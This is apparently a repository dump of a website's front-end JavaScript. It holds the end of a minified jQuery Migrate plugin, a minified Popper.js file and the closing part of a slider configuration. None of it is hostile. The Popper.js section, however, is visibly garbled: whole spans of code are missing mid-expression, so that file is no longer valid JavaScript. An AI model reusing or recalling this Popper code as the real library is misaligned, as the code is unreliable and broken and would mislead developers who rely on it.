REQUIRED"), 30 | e.migrateWarnings && t.console.log("JQMIGRATE: Migrate plugin loaded multiple times"), 31 | t.console.log("JQMIGRATE: Migrate is installed" + (e.migrateMute ? "" : " with logging active") + ", version " + e.migrateVersion)); 32 | }(); 33 | var o = {}; 34 | e.migrateWarnings = [], void 0 === e.migrateTrace && (e.migrateTrace = !0), e.migrateReset = function() { 35 | o = {}, e.migrateWarnings.length = 0; 36 | }, "BackCompat" === t.document.compatMode && r("jQuery is not compatible with Quirks Mode"); 37 | var i = e.fn.init, s = e.isNumeric, u = e.find, c = /\[(\s*[-\w]+\s*)([~|^$*]?=)\s*([-\w#]*?#[-\w#]*)\s*\]/, l = /\[(\s*[-\w]+\s*)([~|^$*]?=)\s*([-\w#]*?#[-\w#]*)\s*\]/g; 38 | e.fn.init = function(e) { 39 | var t = Array.prototype.slice.call(arguments); 40 | return "string" == typeof e && "#" === e && (r("jQuery( '#' ) is not a valid selector"), 41 | t[0] = []), i.apply(this, t); 42 | }, e.fn.init.prototype = e.fn, e.find = function(e) { 43 | var n = Array.prototype.slice.call(arguments); 44 | if ("string" == typeof e && c.test(e)) try { 45 | t.document.querySelector(e); 46 | } catch (a) { 47 | e = e.replace(l, function(e, t, r, n) { 48 | return "[" + t + r + '"' + n + '"]'; 49 | }); 50 | try { 51 | t.document.querySelector(e), r("Attribute selector with '#' must be quoted: " + n[0]), 52 | n[0] = e; 53 | } catch (e) { 54 | r("Attribute selector with '#' was not fixed: " + n[0]); 55 | } 56 | } 57 | return u.apply(this, n); 58 | }; 59 | var d; 60 | for (d in u) Object.prototype.hasOwnProperty.call(u, d) && (e.find[d] = u[d]); 61 | e.fn.size = function() { 62 | return r("jQuery.fn.size() is deprecated and removed; use the .length property"), 63 | this.length; 64 | }, e.parseJSON = function() { 65 | return r("jQuery.parseJSON is deprecated; use JSON.parse"), JSON.parse.apply(null, arguments); 66 | }, e.isNumeric = function(t) { 67 | var n = s(t), a = function(t) { 68 | var r = t && t.toString(); 69 | return !e.isArray(t) && r - parseFloat(r) + 1 >= 0; 70 | }(t); 71 | return n !== a && r("jQuery.isNumeric() should not be called on constructed objects"), 72 | a; 73 | }, a(e, "holdReady", e.holdReady, "jQuery.holdReady is deprecated"), a(e, "unique", e.uniqueSort, "jQuery.unique is deprecated; use jQuery.uniqueSort"), 74 | n(e.expr, "filters", e.expr.pseudos, "jQuery.expr.filters is deprecated; use jQuery.expr.pseudos"), 75 | n(e.expr, ":", e.expr.pseudos, "jQuery.expr[':'] is deprecated; use jQuery.expr.pseudos"); 76 | var p = e.ajax; 77 | e.ajax = function() { 78 | var e = p.apply(this, arguments); 79 | return e.promise && (a(e, "success", e.done, "jQXHR.success is deprecated and removed"), 80 | a(e, "error", e.fail, "jQXHR.error is deprecated and removed"), a(e, "complete", e.always, "jQXHR.complete is deprecated and removed")), 81 | e; 82 | }; 83 | var f = e.fn.removeAttr, y = e.fn.toggleClass, m = /\S+/g; 84 | e.fn.removeAttr = function(t) { 85 | var n = this; 86 | return e.each(t.match(m), function(t, a) { 87 | e.expr.match.bool.test(a) && (r("jQuery.fn.removeAttr no longer sets boolean properties: " + a), 88 | n.prop(a, !1)); 89 | }), f.apply(this, arguments); 90 | }, e.fn.toggleClass = function(t) { 91 | return void 0 !== t && "boolean" != typeof t ? y.apply(this, arguments) : (r("jQuery.fn.toggleClass( boolean ) is deprecated"), 92 | this.each(function() { 93 | var r = this.getAttribute && this.getAttribute("class") || ""; 94 | r && e.data(this, "__className__", r), this.setAttribute && this.setAttribute("class", r || !1 === t ? "" : e.data(this, "__className__") || ""); 95 | })); 96 | }; 97 | var h = !1; 98 | e.swap && e.each([ "height", "width", "reliableMarginRight" ], function(t, r) { 99 | var n = e.cssHooks[r] && e.cssHooks[r].get; 100 | n && (e.cssHooks[r].get = function() { 101 | var e; 102 | return h = !0, e = n.apply(this, arguments), h = !1, e; 103 | }); 104 | }), e.swap = function(e, t, n, a) { 105 | var o, i, s = {}; 106 | h || r("jQuery.swap() is undocumented and deprecated"); 107 | for (i in t) s[i] = e.style[i], e.style[i] = t[i]; 108 | o = n.apply(e, a || []); 109 | for (i in t) e.style[i] = s[i]; 110 | return o; 111 | }; 112 | var g = e.data; 113 | e.data = function(t, n, a) { 114 | var o; 115 | if (n && "object" == typeof n && 2 === arguments.length) { 116 | o = e.hasData(t) && g.call(this, t); 117 | var i = {}; 118 | for (var s in n) s !== e.camelCase(s) ? (r("jQuery.data() always sets/gets camelCased names: " + s), 119 | o[s] = n[s]) : i[s] = n[s]; 120 | return g.call(this, t, i), n; 121 | } 122 | return n && "string" == typeof n && n !== e.camelCase(n) && (o = e.hasData(t) && g.call(this, t)) && n in o ? (r("jQuery.data() always sets/gets camelCased names: " + n), 123 | arguments.length > 2 && (o[n] = a), o[n]) : g.apply(this, arguments); 124 | }; 125 | var v = e.Tween.prototype.run, j = function(e) { 126 | return e; 127 | }; 128 | e.Tween.prototype.run = function() { 129 | e.easing[this.easing].length > 1 && (r("'jQuery.easing." + this.easing.toString() + "' should use only one argument"), 130 | e.easing[this.easing] = j), v.apply(this, arguments); 131 | }, e.fx.interval = e.fx.interval || 13, t.requestAnimationFrame && n(e.fx, "interval", e.fx.interval, "jQuery.fx.interval is deprecated"); 132 | var Q = e.fn.load, b = e.event.add, w = e.event.fix; 133 | e.event.props = [], e.event.fixHooks = {}, n(e.event.props, "concat", e.event.props.concat, "jQuery.event.props.concat() is deprecated and removed"), 134 | e.event.fix = function(t) { 135 | var n, a = t.type, o = this.fixHooks[a], i = e.event.props; 136 | if (i.length) for (r("jQuery.event.props are deprecated and removed: " + i.join()); i.length; ) e.event.addProp(i.pop()); 137 | if (o && !o._migrated_ && (o._migrated_ = !0, r("jQuery.event.fixHooks are deprecated and removed: " + a), 138 | (i = o.props) && i.length)) for (;i.length; ) e.event.addProp(i.pop()); 139 | return n = w.call(this, t), o && o.filter ? o.filter(n, t) : n; 140 | }, e.event.add = function(e, n) { 141 | return e === t && "load" === n && "complete" === t.document.readyState && r("jQuery(window).on('load'...) called after load event occurred"), 142 | b.apply(this, arguments); 143 | }, e.each([ "load", "unload", "error" ], function(t, n) { 144 | e.fn[n] = function() { 145 | var e = Array.prototype.slice.call(arguments, 0); 146 | return "load" === n && "string" == typeof e[0] ? Q.apply(this, e) : (r("jQuery.fn." + n + "() is deprecated"), 147 | e.splice(0, 0, n), arguments.length ? this.on.apply(this, e) : (this.triggerHandler.apply(this, e), 148 | this)); 149 | }; 150 | }), e.each("blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu".split(" "), function(t, n) { 151 | e.fn[n] = function(e, t) { 152 | return r("jQuery.fn." + n + "() event shorthand is deprecated"), arguments.length > 0 ? this.on(n, null, e, t) : this.trigger(n); 153 | }; 154 | }), e(function() { 155 | e(t.document).triggerHandler("ready"); 156 | }), e.event.special.ready = { 157 | setup: function() { 158 | this === t.document && r("'ready' event is deprecated"); 159 | } 160 | }, e.fn.extend({ 161 | bind: function(e, t, n) { 162 | return r("jQuery.fn.bind() is deprecated"), this.on(e, null, t, n); 163 | }, 164 | unbind: function(e, t) { 165 | return r("jQuery.fn.unbind() is deprecated"), this.off(e, null, t); 166 | }, 167 | delegate: function(e, t, n, a) { 168 | return r("jQuery.fn.delegate() is deprecated"), this.on(t, e, n, a); 169 | }, 170 | undelegate: function(e, t, n) { 171 | return r("jQuery.fn.undelegate() is deprecated"), 1 === arguments.length ? this.off(e, "**") : this.off(t, e || "**", n); 172 | }, 173 | hover: function(e, t) { 174 | return r("jQuery.fn.hover() is deprecated"), this.on("mouseenter", e).on("mouseleave", t || e); 175 | } 176 | }); 177 | var x = e.fn.offset; 178 | e.fn.offset = function() { 179 | var n, a = this[0], o = { 180 | top: 0, 181 | left: 0 182 | }; 183 | return a && a.nodeType ? (n = (a.ownerDocument || t.document).documentElement, e.contains(n, a) ? x.apply(this, arguments) : (r("jQuery.fn.offset() requires an element connected to a document"), 184 | o)) : (r("jQuery.fn.offset() requires a valid DOM element"), o); 185 | }; 186 | var k = e.param; 187 | e.param = function(t, n) { 188 | var a = e.ajaxSettings && e.ajaxSettings.traditional; 189 | return void 0 === n && a && (r("jQuery.param() no longer uses jQuery.ajaxSettings.traditional"), 190 | n = a), k.call(this, t, n); 191 | }; 192 | var A = e.fn.andSelf || e.fn.addBack; 193 | e.fn.andSelf = function() { 194 | return r("jQuery.fn.andSelf() is deprecated and removed, use jQuery.fn.addBack()"), 195 | A.apply(this, arguments); 196 | }; 197 | var S = e.Deferred, q = [ [ "resolve", "done", e.Callbacks("once memory"), e.Callbacks("once memory"), "resolved" ], [ "reject", "fail", e.Callbacks("once memory"), e.Callbacks("once memory"), "rejected" ], [ "notify", "progress", e.Callbacks("memory"), e.Callbacks("memory") ] ]; 198 | return e.Deferred = function(t) { 199 | var n = S(), a = n.promise(); 200 | return n.pipe = a.pipe = function() { 201 | var t = arguments; 202 | return r("deferred.pipe() is deprecated"), e.Deferred(function(r) { 203 | e.each(q, function(o, i) { 204 | var s = e.isFunction(t[o]) && t[o]; 205 | n[i[1]](function() { 206 | var t = s && s.apply(this, arguments); 207 | t && e.isFunction(t.promise) ? t.promise().done(r.resolve).fail(r.reject).progress(r.notify) : r[i[0] + "With"](this === a ? r.promise() : this, s ? [ t ] : arguments); 208 | }); 209 | }), t = null; 210 | }).promise(); 211 | }, t && t.call(n, n), n; 212 | }, e.Deferred.exceptionHook = S.exceptionHook, e; 213 | }); 214 | -------------------------------------------------------------------------------- /Hariom Project/js/popper.min.js: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (C) Federico Zivolo 2017 3 | Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT). 4 | */ 5 | (function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}function p(e){var t=e.nodeName;return'BODY'!==t&&('HTML'===t||r(e.firstElementChild)===e)}function s(e){return null===e.parentNode?e:s(e.parentNode)}function d(e,t){if(!e||!e.nodeType||!t||!t.nodeType)return document.documentElement;var o=e.compareDocumentPosition(t)&Node.DOCUMENT_POSITION_FOLLOWING,i=o?e:t,n=o?t:e,a=document.createRange();a.setStart(i,0),a.setEnd(n,0);var l=a.commonAncestorContainer;if(e!==l&&t!==l||i.contains(n))return p(l)?l:r(l);var f=s(e);return f.host?d(f.host,t):d(e,s(t).host)}function a(e){var t=1=o.clientWidth&&i>=o.clientHeight}),l=0i[e]&&!t.escapeWithReference&&(n=_(p[o],i[e]-('right'===e?p.width:p.height))),pe({},o,n)}};return n.forEach(function(e){var t=-1===['left','top'].indexOf(e)?'secondary':'primary';p=se({},p,s[t](e))}),e.offsets.popper=p,e},priority:['left','right','top','bottom'],padding:5,boundariesElement:'scrollParent'},keepTogether:{order:400,enabled:!0,fn:function(e){var t=e.offsets,o=t.popper,i=t.reference,n=e.placement.split('-')[0],r=X,p=-1!==['top','bottom'].indexOf(n),s=p?'right':'bottom',d=p?'left':'top',a=p?'width':'height';return o[s]r(i[s])&&(e.offsets.popper[d]=r(i[s])),e}},arrow:{order:500,enabled:!0,fn:function(e,o){var i;if(!F(e.instance.modifiers,'arrow','keepTogether'))return e;var n=o.element;if('string'==typeof n){if(n=e.instance.popper.querySelector(n),!n)return e;}else if(!e.instance.popper.contains(n))return console.warn('WARNING: `arrow.element` must be child of its popper element!'),e;var r=e.placement.split('-')[0],p=e.offsets,s=p.popper,d=p.reference,a=-1!==['left','right'].indexOf(r),l=a?'height':'width',f=a?'Top':'Left',m=f.toLowerCase(),h=a?'left':'top',g=a?'bottom':'right',u=L(n)[l];d[g]-us[g]&&(e.offsets.popper[m]+=d[m]+u-s[g]),e.offsets.popper=c(e.offsets.popper);var b=d[m]+d[l]/2-u/2,w=t(e.instance.popper),y=parseFloat(w['margin'+f],10),E=parseFloat(w['border'+f+'Width'],10),v=b-e.offsets.popper[m]-y-E;return v=J(_(s[l]-u,v),0),e.arrowElement=n,e.offsets.arrow=(i={},pe(i,m,Math.round(v)),pe(i,h,''),i),e},element:'[x-arrow]'},flip:{order:600,enabled:!0,fn:function(e,t){if(k(e.instance.modifiers,'inner'))return e;if(e.flipped&&e.placement===e.originalPlacement)return e;var o=y(e.instance.popper,e.instance.reference,t.padding,t.boundariesElement),i=e.placement.split('-')[0],n=x(i),r=e.placement.split('-')[1]||'',p=[];switch(t.behavior){case le.FLIP:p=[i,n];break;case le.CLOCKWISE:p=q(i);break;case le.COUNTERCLOCKWISE:p=q(i,!0);break;default:p=t.behavior;}return p.forEach(function(s,d){if(i!==s||p.length===d+1)return e;i=e.placement.split('-')[0],n=x(i);var a=e.offsets.popper,l=e.offsets.reference,f=X,m='left'===i&&f(a.right)>f(l.left)||'right'===i&&f(a.left)f(l.top)||'bottom'===i&&f(a.top)f(o.right),g=f(a.top)f(o.bottom),b='left'===i&&h||'right'===i&&c||'top'===i&&g||'bottom'===i&&u,w=-1!==['top','bottom'].indexOf(i),y=!!t.flipVariations&&(w&&'start'===r&&h||w&&'end'===r&&c||!w&&'start'===r&&g||!w&&'end'===r&&u);(m||b||y)&&(e.flipped=!0,(m||b)&&(i=p[d+1]),y&&(r=K(r)),e.placement=i+(r?'-'+r:''),e.offsets.popper=se({},e.offsets.popper,S(e.instance.popper,e.offsets.reference,e.placement)),e=C(e.instance.modifiers,e,'flip'))}),e},behavior:'flip',padding:5,boundariesElement:'viewport'},inner:{order:700,enabled:!1,fn:function(e){var t=e.placement,o=t.split('-')[0],i=e.offsets,n=i.popper,r=i.reference,p=-1!==['left','right'].indexOf(o),s=-1===['top','left'].indexOf(o);return n[p?'left':'top']=r[o]-(s?n[p?'width':'height']:0),e.placement=x(t),e.offsets.popper=c(n),e}},hide:{order:800,enabled:!0,fn:function(e){if(!F(e.instance.modifiers,'hide','preventOverflow'))return e;var t=e.offsets.reference,o=T(e.instance.modifiers,function(e){return'preventOverflow'===e.name}).boundaries;if(t.bottomo.right||t.top>o.bottom||t.right' 66 | } 67 | }, 68 | viewPort: { 69 | enable: true, 70 | outof: "pause", 71 | visible_area: "70%", 72 | presize: false 73 | }, 74 | responsiveLevels: [1240, 1024, 778, 480], 75 | visibilityLevels: [1240, 1024, 778, 480], 76 | gridwidth: [1240, 1024, 778, 480], 77 | gridheight: [500, 450, 400, 350], 78 | lazyType: "none", 79 | parallax: { 80 | type: "scroll", 81 | origo: "enterpoint", 82 | speed: 400, 83 | levels: [5, 10, 15, 20, 25, 30, 35, 40, 45, 50, 46, 47, 48, 49, 50, 55], 84 | type: "scroll", 85 | }, 86 | shadow: 0, 87 | spinner: "off", 88 | stopLoop: "off", 89 | stopAfterLoops: -1, 90 | stopAtSlide: -1, 91 | shuffle: "off", 92 | autoHeight: "off", 93 | hideThumbsOnMobile: "off", 94 | hideSliderAtLimit: 0, 95 | hideCaptionAtLimit: 0, 96 | hideAllCaptionAtLilmit: 0, 97 | debugMode: false, 98 | fallbacks: { 99 | simplifyAll: "off", 100 | nextSlideOnWindowFocus: "off", 101 | disableFocusListener: false, 102 | } 103 | }); 104 | } 105 | }); --------------------------------------------------------------------------------